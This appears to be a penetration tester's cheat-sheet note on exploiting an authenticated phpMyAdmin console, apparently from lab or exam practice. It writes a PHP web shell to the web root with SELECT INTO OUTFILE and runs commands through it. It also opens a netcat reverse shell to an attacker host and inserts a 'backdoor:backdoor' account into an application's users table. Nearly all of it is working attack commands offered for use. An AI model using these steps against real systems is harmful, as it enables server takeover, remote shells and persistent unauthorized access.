phpmyadmin

(Authenticated)

[1]Navigate to Server → SQL , add and save this string

SELECT "<?php system($_GET['cmd']); ?>" into outfile “/var/www/html/backdoor.php”

[2]Command injection

http://192.168.101.108/backdoor.php?cmd=whoami

[3]Revshell

http://192.168.101.108/backdoor.php?cmd=nc 192.168.101.95 4444 -e /bin/bash

#Adding a new user (Authenticated)

Once you get access to phpmyadmin console,click on users and find username passwords.
Add a new user for privilege escalation

Click on SQL tab to inject SQL

insert into webappdb.users(password, username) VALUES ("backdoor","backdoor");

adding new user and password with “backdoor” creds

select * from webappdb.users 

Now that you have created a new user you can login with backdoor:backdoor

http://192.168.177.10/login.php   (Tom's taco truck)